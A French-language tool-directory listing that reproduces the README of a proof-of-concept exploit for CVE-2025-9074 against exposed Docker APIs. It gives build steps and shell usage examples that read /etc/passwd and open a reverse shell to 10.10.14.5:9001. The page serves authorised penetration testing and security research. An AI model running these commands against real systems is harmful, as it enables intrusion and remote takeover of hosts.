Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
poc-2025-9074 — Docker API CVE-2025-9074 PoC (Preuve de concept). Un framework d'exploitation sophistiqué pour CVE-2025-9074, ciblant les points de terminaison Docker API non authentifiés avec un shell de commandes interactif intégré. | Kitploit
Outils/GitHubGitHub/xwpdx0/poc-2025-9074
Sécurité de l'Infrastructure CloudEscalade de PrivilègesScanners de VulnérabilitésSécurité des ConteneursFrameworks d'ExploitationExploitationPost-ExploitationTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHub
41il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
xwpdx0/poc-2025-9074

poc-2025-9074

Docker API CVE-2025-9074 PoC (Preuve de concept). Un framework d'exploitation sophistiqué pour CVE-2025-9074, ciblant les points de terminaison Docker API non authentifiés avec un shell de commandes interactif intégré.

Voir le dépôt
Partager

CVE-2025-9074 | Docker API CVE-2025-9074 PoC (Preuve de concept)

Un framework d'exploitation sophistiqué pour CVE-2025-9074, ciblant les points de terminaison d'API Docker non authentifiés avec un shell de commande interactif intégré.

Language Platform License

Aperçu

Cet outil automatise l'exploitation d'instances Docker exposées via leur API sans authentification, permettant de créer des conteneurs et d'exécuter des commandes sur l'hôte cible. L'outil dispose d'un shell interactif personnalisé pour des opérations de post-exploitation fluides.

Remarque : Il s'agit d'une implémentation PoC personnalisée. Je n'ai pas découvert CVE-2025-9074.

Démonstration

Exploitation initiale

Processus d'exploitation

Détection automatisée des vulnérabilités, téléchargement d'images, création et initialisation de conteneurs

Exécution interactive de commandes

Exécution de commandes

Shell de post-exploitation avec capacités d'exécution de commandes

Fonctionnalités clés

  • Analyse automatisée des vulnérabilités de l'API Docker
  • Déploiement de conteneurs avec montage du système de fichiers hôte
  • Shell interactif de post-exploitation
  • Interface d'exécution de commandes à distance
  • Module de déploiement de reverse shell
  • Sortie terminal en couleur pour une meilleure visibilité

Installation

  1. Cloner le dépôt
root@kitploit:~
git clone https://github.com/xwpdx0/poc-2025-9074
  1. Compiler le code
root@kitploit:~
gcc poc.c -o poc-2025-9074

ou vous pouvez télécharger le binaire depuis les Releases

Utilisation

root@kitploit:~
./poc-2025-9074

Cible par défaut

Exécuter l'outil contre la cible par défaut (127.0.0.1:2375) :

root@kitploit:~
./poc-2025-9074

Cible personnalisée

Spécifier un point de terminaison d'API Docker personnalisé :

Cible personnalisée

Shell interactif

Une fois l'exploitation réussie, un shell interactif fournit les commandes suivantes :

CommandDescription
cmd <command>Exécuter des commandes arbitraires dans le conteneur

Exemples d'utilisation

root@kitploit:~
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info

Détails de la vulnérabilité

CVE-2025-9074 affecte les instances Docker dont les points de terminaison d'API sont exposés sans mécanismes d'authentification appropriés. Cette mauvaise configuration permet un accès non autorisé au démon Docker, permettant :

  • Création arbitraire de conteneurs
  • Accès au système de fichiers hôte via des montages bind
  • Opportunités d'élévation de privilèges
  • Exécution de code à distance

Avertissement légal

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.

  • À utiliser uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test
  • L'accès non autorisé à des systèmes informatiques est illégal et puni par la loi
  • L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil
  • Les utilisateurs sont seuls responsables du respect des lois et réglementations applicables

Auteur

xwpd (@xwpdx0)

Licence

Licence MIT — Voir le fichier LICENSE pour plus de détails


Uniquement à des fins de divulgation responsable et de recherche en sécurité.

Télécharger l’outil
revshell <ip> <port>
Déployer un reverse shell vers l'écouteur spécifié
infoAfficher les informations actuelles sur le conteneur et la cible
exitTerminer la session interactive